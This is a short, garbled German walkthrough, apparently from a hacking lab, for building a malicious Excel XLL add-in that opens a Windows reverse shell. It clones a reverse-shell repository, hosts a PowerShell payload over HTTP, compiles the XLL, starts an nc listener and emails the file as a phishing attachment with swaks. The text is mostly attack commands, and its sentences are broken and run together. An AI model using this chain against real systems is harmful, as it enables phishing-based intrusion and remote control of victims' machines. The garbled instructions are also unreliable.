
xll Windows-Reverse-Shell
xll Windows-Reverse-Shell
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1python3 -m http.server 9999
notpadXLL.c auf deine Windows-Angreifer-Maschine und aktualisiere notpadXLL.c entsprechend.x64 Native Tools Command Prompt for VS 2022notepad.xll zu erzeugencl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll auf deine Kali-Maschineswaks herunter curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks, um eine E-Mail mit angehängter notepad.xll zu senden:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
